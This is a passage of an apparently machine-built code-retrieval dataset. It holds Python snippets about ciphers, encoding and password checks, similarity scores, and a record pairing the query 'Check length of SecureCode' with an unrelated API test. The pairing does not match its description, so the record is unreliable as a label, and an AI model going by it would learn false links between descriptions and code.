fuzz(text)\r\n return hexify(cipher)", "def get21_str(in_dict):\n return \"\"\"BEGIN:VCARD\nVERSION:2.1\nN;ENCODING=QUOTED-PRINTABLE;CHARSET=UTF-8:;%s;;;\nTEL;VOICE;CELL:%s\nEND:VCARD\n\"\"\"%(quopri.encodestring(in_dict[\"name\"]), in_dict[\"tel\"])", "def encrypt_vigenere(plaintext: str, keyword: str) -> str:\n ciphertext = \"\"\n # PUT YOUR CODE HERE\n\n key_lenght = len(keyword)\n text_lenght = len(plaintext)\n while key_lenght != text_lenght:\n keyword += keyword\n key_lenght = len(keyword)\n if key_lenght > text_lenght:\n keyword = keyword[:text_lenght]\n key_lenght = len(keyword)\n code_key = []\n ord_A = ord('A')\n ord_a = ord('a')\n\n if plaintext.islower():\n for i in range(key_lenght):\n if plaintext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_a)\n code_text = []\n for n in range(text_lenght):\n if plaintext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(plaintext[n]) - ord_a)\n ciphertext = ''\n for u in range(len(plaintext)):\n if plaintext[u] == \" \":\n ciphertext += \" \"\n else:\n value = (code_key[u] + code_text[u]) % 26 + ord_a\n ciphertext += chr(value)\n else:\n for i in range(key_lenght):\n if plaintext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_A)\n code_text = []\n for n in range(text_lenght):\n if plaintext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(plaintext[n]) - ord_A)\n ciphertext = ''\n for u in range(len(plaintext)):\n if plaintext[u] == \" \":\n value = ord(\" \")\n else:\n value = (code_key[u] + code_text[u]) % 26 + ord_A\n ciphertext += chr(value)\n return ciphertext", "def send_text(self, data: str) -> None:", "def encode(text, password):\r\n\tstep_index = 0\r\n\tencoded_text = ''\r\n\tfor letter in text:\r\n\t\tencoded_text += next_letter(letter, to_int(password[step_index]))\r\n\t\tstep_index += 1\r\n\t\tif step_index > len(password)-1:\r\n\t\t\tstep_index = 0\r\n\treturn encoded_text", "def make_secure_val(string):\n\n return \"%s|%s\" % (string, hash_str(string))", "def _create_invitation_code(\n invitation_data: InvitationInputs, secret_key: bytes\n) -> bytes:\n\n # builds content\n content = InvitationContent(\n **invitation_data.dict(),\n created=datetime.utcnow(),\n )\n\n content_jsonstr: str = _ContentWithShortNames.serialize(content)\n assert \"\\n\" not in content_jsonstr # nosec\n\n # encrypts contents\n return _fernet_encrypt_as_urlsafe_code(\n data=content_jsonstr.encode(),\n secret_key=secret_key,\n )", "def password(self) -> str:", "def send_tx(self, tx):\n if sys.version_info >= (3, 0):\n tx = tx.encode('ascii')\n tx_b64 = base64.b64encode(tx)\n self.__rpc_client.call(\"Babble.SubmitTx\", [tx_b64], expect_reply=True)", "def test_encode(self):\n pass # TODO(tlarsen)", "def cipher_feedback(self):", "def obfuscate(self):\n r = self.public_key.get_random_lt_n()\n r_pow_n = powmod(r, self.public_key.n, self.public_key.nsquare)\n self.__ciphertext = self.__ciphertext * r_pow_n % self.public_key.nsquare\n self.__is_obfuscated = True", "def uCSIsEnclosedAlphanumerics(code):\n ret = libxml2mod.xmlUCSIsEnclosedAlphanumerics(code)\n return ret", "def email_escape(string):\n return ''.join('&#x%x;' % (ord(c),) for c in string)", "def test_escape_argument_simple():\n encoded = win_functions.escape_argument(\"simple\")\n assert encoded == \"simple\"", "def _encode_urlplus(data: str) -> str:\n return urllib.parse.quote_plus(data, safe=\"\")", "def encode(key: str, clear: str) -> str:\n\n enc = []\n for i in 
range(len(clear)):\n key_c = key[i % len(key)]\n enc_c = chr((ord(clear[i]) + ord(key_c)) % 256)\n enc.append(enc_c)\n return base64.urlsafe_b64encode(\"\".join(enc).encode()).decode()", "def encode(message, cipher):\n return message.translate(str.maketrans(letters, ''.join(cipher)))", "def _escape_code(code: str) -> str:\n if code.isalnum() or code.replace(\".\", \"\").isalnum():\n return code\n # replace:\n # \\ -> \\\\\n # \" -> \\\"\n esc = code.replace(\"\\\\\", \"\\\\\\\\\").replace('\"', '\\\\\"')\n return f'\"{esc}\"'", "def encrypt(inp):\n # prepare plaintext\n prefix = \"comment1=cooking%20MCs;userdata=\"\n suffix = \";comment2=%20like%20a%20pound%20of%20bacon\"\n pt = inp.replace(\";\", \"\").replace(\"=\", \"\") # remove invalid character\n pt = prefix + pt + suffix # add prefix and suffix\n pt_encoded = pt.encode(\"utf-8\")\n pt_padded = pkcs7.add(pt_encoded, aes.S_BLOCK)\n\n # encrypt\n ct = aes.cbc_encrypt(pt_padded, KEY, IV)\n\n return ct" ]
[ "0.5938938", "0.5815948", "0.5810851", "0.5708405", "0.56919646", "0.5627045", "0.5606181", "0.5592183", "0.55913097", "0.55869216", "0.55449724", "0.55205464", "0.550454", "0.54743934", "0.5459042", "0.544217", "0.5438045", "0.5424514", "0.5418585", "0.54139405", "0.5389448", "0.5383088", "0.53789955", "0.5353896", "0.5353896", "0.53534156", "0.53528786", "0.5348257", "0.5333557", "0.5323421", "0.5318857", "0.53108984", "0.53108984", "0.5305031", "0.53049105", "0.5300222", "0.5299745", "0.52940524", "0.52866423", "0.5284398", "0.5256815", "0.52538997", "0.52464014", "0.5202234", "0.5197767", "0.5194464", "0.5184163", "0.5168935", "0.5163424", "0.51617867", "0.5161596", "0.51606375", "0.51496404", "0.5145018", "0.51411694", "0.51400334", "0.51307607", "0.51251054", "0.5105978", "0.51052284", "0.5099759", "0.5090243", "0.50839853", "0.50829655", "0.5079727", "0.5077902", "0.50742006", "0.50646216", "0.5060674", "0.50593466", "0.5056762", "0.50552016", "0.5039623", "0.5037394", "0.5035086", "0.5023805", "0.5018405", "0.5014711", "0.50140625", "0.5013668", "0.500484", "0.4993738", "0.499285", "0.49920368", "0.49898076", "0.49810806", "0.49773908", "0.49687195", "0.49668914", "0.49633166", "0.4959656", "0.49543676", "0.49430874", "0.49429813", "0.4932872", "0.49322197", "0.4930267", "0.49301288", "0.49260452", "0.4922359", "0.49209127" ]
0.0
-1
Check length of SecureCode (SecureCode= 1 )
def test_36(self): assert 'False' == Api.requestBlock('test-36')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def __len__(self):\n return len(self.code)", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def is_private(code):\n return 4000 <= code <= 4999", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def __len__(self):\n return self.cli.passwords.len()", "def is_reserved(code):\n return 1000 <= code <= 2999", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def SecondPart():\n return passwordChecker(data)", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], 
cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def check(s1):\n chars = [0] * 128\n for c in s1:\n chars[ord(c)]+=1\n\n counter = 0\n for i in range(len(chars)):\n if chars[i] %2 != 0:\n counter+=1\n \n return counter <= 1", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def checksum(code):\n return sum(code) % 256", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def check_secure_val(secure_val):\n val = 
secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def check_pwd_policy1(processed):\n policy, letter, pwd = processed\n return pwd.count(letter) in policy", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def is_valid_payload(p):\n # if the checksum is valid the checksum calculation, without removing the\n # checksum, should be equal to zero\n\n if checksum16(p) == 0:\n return True\n else:\n return False", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. 
n_bytes must be < 97.\")\n else:\n return verifier", "def strlen(val): \n return len(val)", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def sanetoken(token):\n\t# len(CryptoHelper.longEncode(2**4096)) = 1372\n\tMAX_TOKEN_LEN = 1372\n\treturn len(token) <= MAX_TOKEN_LEN", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def verify(self, k, code, counter = -1, window=30, allowed_steps=2):\n # if counter == -1:\n # verifycode = self.hotp(k, counter)\n # else:\n for i in range(0, allowed_steps + 1):\n c = hex(int((time.time() - i * window) // window))[2:]\n while len(c) < 16:\n c = \"0\" + c\n\n verifycode = self.totp(k, c, window=window)\n if code == verifycode:\n return True\n return False", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should 
not be less than four characters.\")", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def validate(info):\n\n\tif info == \"\": \n\t\treturn False\n\telse:\n\t\tif len(info) < 5 or len(info) > 32:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def check_passcode_required(document_html):\n if \"visitor[passcode]\" in document_html:\n return True\n else:\n return False", "def isEncAddress(key):\n\tif re.search('^EAddr38[a-km-zA-HJ-NP-Z0-9]{56}$', key):\n\t\tif checkChecksum(key) is False:\n\t\t\treturn True, 'checksum'\n\t\treturn True, 'good'\n\telse:\n\t\treturn False, 'not valid'", "def bit_length(self, ???):", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def url_contains_auth_code(url: str) -> bool:\n return url.count(\"code=\") == 1", "def test_valid_length(self):\n f = lws.valid_length\n assert f('', [1]) is True\n assert f('+', [1, 1]) is True\n assert f('+', []) is False\n assert f('?', []) is True\n assert f('?', [1]) is True\n assert f('?', [1, 1]) is False\n assert f('?', [1, 1, 1]) is False\n assert f('*', []) is True\n assert f('*', [1, 1, 1]) is True", "def check(secret: bytes, b64str: str, values: Dict[str, Any]) -> bool:\n return check_with_reason(secret, b64str, values)[0]", "def test_generate_secret(self):\n random_secret = ef_password.generate_secret(24)\n self.assertEqual(len(random_secret), 24)\n assert not set('[~!@#$%^&*()_+{}\":;\\']+$').intersection(random_secret)", "def test_long_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_longstr', 'hello world'), '\\x00\\x00\\x00\\x0bhello world', 'positive length long string encoding FAILED...')", "def verify(self, code) -> bool:\n totp = self.__initialize_totp()\n return totp.verify(code)", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def WinCheck(field):\n for i in range(len(field)):\n if field[i] == 2048:\n return True\n return False", "def test_short_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_shortstr', 'hello world'), '\\x0bhello world', 'positive length short string encoding FAILED...')", "def validate_key_code(self, code):\n\n key = self.connect().query(KeyCode)\\\n 
.filter(KeyCode.code == code)\\\n .first()\n\n if key and (key.user and key.enabled):\n return True\n return False", "def is_valid(self):\n if len(self) <= 64 and re.match(RE_VALID_UID, self):\n return True\n\n return False", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def request_two_factor_code(self):\n code = ''\n while not code:\n code = input('Enter 2FA code: ')\n return code", "def validate_signature(self):\n return self.signature == 0xAA55", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def test_random_code_generator(self):\n # Produces similar to '8FHGNH'\n code = random_code_generator()\n self.assertEquals(len(code), 6)\n code_2 = random_code_generator()\n if code == code_2:\n self.assertEquals(False)\n # Produces similar to 'CFB-U8X-9KE-TY8':\n code_3 = random_code_generator(12, 4, '-')\n self.assertEquals(len(code_3), 15)\n self.assertEquals(len(code_3.replace('-', '')), 12)\n code_4 = random_code_generator(100, banned_chars='X')\n self.assertEquals(code_4.find('X'), -1)", "def len12(self, len): # -> None:\n ...", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * 
\\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def check_record(self, record):\n checking = reduce(lambda x,y: x + y, [int(record[i*2:i*2+2], 16) for i in [x for x in xrange(len(record)/2)]])\n if ('%02x' % checking)[-2:] != '00':\n raise Exception ('ERROR: Checksum doesn\\' match! Record is %s' % (record, ))", "def read_code_chksum(ctl):\n\treturn ctl.bus_read_struct_coherent(tm.status_addr + 4, 'I')", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def validate_verification_code(self, device, code):\n #LOGGER.info(f\"Verification code-{code}\")\n device.update({'verificationCode': code, 'trustBrowser': True})\n data = json.dumps(device)\n\n try:\n self.session.post(\n f\"{self.SETUP_ENDPOINT}/validateVerificationCode\",\n params=self.params,\n data=data,\n )\n except PyiCloudAPIResponseException as error:\n LOGGER.info(f\"Verification Error code-{error.code}\")\n if error.code == -21669:\n # Wrong verification code\n return False\n #raise\n\n # Re-authenticate, which will both update the HSA data, and\n # ensure that we save the X-APPLE-WEBAUTH-HSA-TRUST cookie.\n self.authenticate()\n\n return not self.requires_2sa", "def test_right_checksum(self):\n self.assertEqual(utils.checksum('fooo'), 'L')", "def cleanCode(si):\n while len(si) < 4: si += 'x' # fill out the length of the code string\n so = \"\"\n for ii in range(4):\n if si[ii] in \"1234567890abcdefxyABCDEFX\": # check if this is a valid character\n# [0-9a-fA-FxyX]\n so += si[ii] # valid character\n else:\n so += \"xxxx\" # fill the string with 'x'\n ii = 4 # hit a bad one, stop checking string\n return so[:4] # clean code is 4 characters long", "def is_valid_part1(line):\n char_min, char_max, required_char, password = parse_line(line)\n char_count = password.count(required_char)\n if (char_min <= char_count <= char_max):\n return True\n return False", "def bech32_verify_checksum(hrp, data):\n return bech32_polymod(bech32_hrp_expand(hrp) + data) == 1", "def test_random_password():\n output = sh.random_password()\n assert isinstance(output, str) is True\n assert len(output) == 16" ]
[ "0.641404", "0.6408166", "0.6400148", "0.63096166", "0.62442255", "0.62413037", "0.616265", "0.60951114", "0.606613", "0.60156256", "0.5987383", "0.5973827", "0.5954586", "0.58762735", "0.58288664", "0.5818708", "0.5816221", "0.580496", "0.5798687", "0.5756989", "0.5754382", "0.57506204", "0.57454234", "0.5739592", "0.573679", "0.57038766", "0.56972295", "0.56972295", "0.5665901", "0.5650119", "0.56466365", "0.5643226", "0.5623543", "0.5615813", "0.5608662", "0.5595188", "0.55891144", "0.5588602", "0.55877", "0.5579061", "0.5568094", "0.5567063", "0.5566336", "0.5559184", "0.5554295", "0.55514485", "0.5547684", "0.5541313", "0.55148995", "0.5491818", "0.54854286", "0.54845583", "0.5478685", "0.5463714", "0.54561144", "0.54558927", "0.5449083", "0.5449083", "0.54412514", "0.54377", "0.5435044", "0.5417094", "0.5400456", "0.53986925", "0.53935736", "0.53928345", "0.5383975", "0.5381854", "0.5377882", "0.53750557", "0.53737193", "0.5369454", "0.53590715", "0.5354046", "0.535319", "0.5343734", "0.53401905", "0.5337463", "0.5318942", "0.5317899", "0.5313353", "0.5311056", "0.53066283", "0.5304315", "0.5303944", "0.52930075", "0.5289208", "0.52890486", "0.52846086", "0.52835685", "0.5280096", "0.52776504", "0.52736545", "0.52635914", "0.5256442", "0.52546173", "0.52526826", "0.5237914", "0.5229825", "0.5225429", "0.52244264" ]
0.0
-1
Check length of SecureCode (SecureCode = 12)
def test_37(self): assert 'False' == Api.requestBlock('test-37')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
